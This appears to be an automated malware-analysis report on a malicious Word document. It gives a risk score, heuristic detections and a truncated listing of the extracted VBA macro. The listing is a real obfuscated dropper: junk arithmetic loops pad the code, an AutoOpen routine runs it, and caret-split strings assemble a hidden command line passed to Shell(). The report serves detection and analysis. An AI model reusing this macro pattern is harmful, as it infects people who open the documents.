MALICIOUS (Risk Score: 242)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro calls the Shell() function, indicating an attempt to execute an external command or payload. The presence of legacy WordBasic auto-exec markers together with the critical Shell() call strongly suggests dropper or downloader functionality, aiming to fetch and execute a secondary malicious component.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6573547-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6573547-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18234 bytes |

SHA-256 (macros.bas): c59419f63683cc0e16499a3221464d44f31e7af14500fc25fd9ac9ed6edbfa17
Preview script (first 1,000 lines of the extracted script). The arithmetic loops between statements are junk padding that never affects control flow (every procedure starts with On Error Resume Next), while the caret-split string fragments (`%^c^o^m^S^p^E^c^%`, `/V`, `set %...%=`) are concatenated by ziniZbc() into the command line that Shell() receives in RDNZc():

```vb
Attribute VB_Name = "CazNiHiGvDQpcT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function RDNZc()
On Error Resume Next
For bZTbll = jcKSWz To 42353
WQBCb = (wNCaQ - ChrW(94397 * 60850) * YiuqC * CInt(zRpSH + Sqr(90268)) + 20233 - 26940 / 8724 - CDate(hDIRHs - 13146 + 72907 - Hex(YcMQAV / 77082)) + (jEjXj * Tan(FGFbiv)))
Next
For MkIDtN = NtfXID To 57594
nApzTt = (JYbBGC - ChrW(21964 * 3619) * XqFMs * CInt(NHIzn + Sqr(80883)) + 47612 - 16739 / 28181 - CDate(TSTEml - 54524 + 75725 - Hex(bkcrGm / 4818)) + (OzSwRv * Tan(nhpUGl)))
Next
RDNZc = CVmmnAGHQnk + Shell(wXtrWHGPO + Chr(SfoPJraRjdV + vbKeyC + PESEdNrILMj) + ziniZbc + wvpDXX + wtFIfUXGT + lKcVvAn + NaKVdOrB + XfIcazulMCh + wNYUNia, UrOZhF + 0 + NiECHwX)
For PMZnks = fmORbR To 37155
PBMkwK = (wdBXj - ChrW(33357 * 8714) * IhzqUP * CInt(TCKti + Sqr(24842)) + 8737 - 64030 / 82030 - CDate(QBRoHV - 73969 + 50217 - Hex(QvlMI / 61525)) + (qFkbbw * Tan(zhJaE)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For wrvKtT = mHALN To 31123
wWhpC = (HWwwP - ChrW(5254 * 33351) * UGwuhw * CInt(ZAbTo + Sqr(31796)) + 77332 - 67573 / 10432 - CDate(OKkXb - 99957 + 38062 - Hex(qUasz / 91292)) + (CjSACQ * Tan(SDZWGW)))
Next
RDNZc
For zTntY = rjItG To 58357
qdkjA = (cmhViD - ChrW(15093 * 66249) * jzEtzK * CInt(Bnzbuw + Sqr(41877)) + 50993 - 48442 / 89096 - CDate(upoTt - 41462 + 51747 - Hex(bQzEqQ / 35876)) + (zLoNhL * Tan(czjZld)))
Next
End Sub
Attribute VB_Name = "GwnfNtDND"
Function ziniZbc()
On Error Resume Next
For DfSlU = KYroIQ To 57626
iIIksl = (KljdH - ChrW(86843 * 21632) * rYEXO * CInt(VqTUG + Sqr(38607)) + 12024 - 40603 / 62750 - CDate(kLXYz - 761 + 86329 - Hex(Mwtti / 13845)) + (mwAzQ * Tan(tPOIS)))
Next
slBzZT = "md" + " okNiH" + "FhwAmL UZ" + "XfHuVclwPWupz" + "RNUiUD HmZ" + "zVEhQjl" + "C & %^" + "c^o^m^S^p^E^c^%" + " %" + "^c^o^m"
For PmRKpE = twVma To 82608
zKRTcH = (IUVGV - ChrW(31529 * 24854) * vJQfLc * CInt(vlDoQ + Sqr(25767)) + 30876 - 31714 / 23084 - CDate(JlEiw - 89222 + 61287 - Hex(cHSwE / 39677)) + (FDAMWv * Tan(CjPjQn)))
Next
RcipBT = "^S^p^E" + "^c^% " + " " + " /V " + " " + " /c" + " set " + "%CWfKESCP" + "tsVqjRz%=fnRc"
For zsDJjM = IHzOkU To 66863
AwjiA = (KPEpi - ChrW(56475 * 67057) * TRdsT * CInt(POnYIJ + Sqr(94877)) + 90884 - 4795 / 95275 - CDate(awhfQz - 65150 + 76130 - Hex(oczTCi / 93123)) + (oflsBF * Tan(lLIaq)))
Next
BYrkkDwjqJ = "bQvQ" + "thvz&&s" + "et %Va" + "uipzOI%=p&&" + "set %" + "mdOQczzA%=o^w" + "&&set %XDjjlrm" + "jUGIC"
For PNGCD = BtDSvE To 76004
nPTWZM = (HWMuZ - ChrW(83579 * 53168) * FrHwSZ * CInt(tRwCu + Sqr(81277)) + 71012 - 25608 / 78866 - CDate(NQSWsl - 539 + 57517 - Hex(HqtIip / 50207)) + (wboHVO * Tan(WCYXS)))
Next
iSTOwRn = "jEK%=mvqhWXC" + "cOJb" + "l&" + "&set %jX" + "hrnPGZpSU%=!%"
For WJXHL = JXNFHS To 36136
YzJUN = (qmmAf - ChrW(85642 * 4397) * AqNcLc * CInt(hWBSOQ + Sqr(53960)) + 71340 - 41344 / 62925 - CDate(CwzXsE - 19843 + 95433 - Hex(jXWbTY / 30005)) + (WriHq * Tan(rcIBwD)))
Next
UMEVwwd = "VauipzOI" + "%!&&" + "set %" + "bP" + "RWXCrpMl" + "Frf" + "QN%=iPvXGJiz" + "rN&&se" + "t %jiMQEKiDFsj" + "N%=e^r&&set %"
For BQUqq = udzJS To 27104
CKzZzq = (FOdBh - ChrW(22077 * 32055) * ukCLt * CInt(hGCkd + Sqr(36066)) + 41498 - 88448 / 49655 - CDate(Mtvdhc - 66759 + 4721 - Hex(CJnnS / 17226)) + (oliMHG * Tan(dUDzo)))
Next
lutTHBzApc = "OVHtCShYUH%=!%" + "mdOQ" + "czzA%!" + "&&set "
For XfLov = oPmbRB To 99949
qIuTk = (wdkLNa - ChrW(10741 * 47492) * Jdfuj * CInt(XwzrcU + Sqr(28583)) + 3840 - 19276 / 32088 - CDate(HDdVa - 69600 + 24089 - Hex(Xtvza / 40110)) + (PzdzlH * Tan(STJub)))
Next
wtPVmV = "%BupGoSYGAGiZ" + "R%=s&" + "&set %dA" + "BDVbQ" + "BIEo" + "liiM%=ZApwCF" + "Jdww&&"
ziniZbc = slBzZT + RcipBT + BYrkkDwjqJ + iSTOwRn + UMEVwwd + l
```

... (truncated)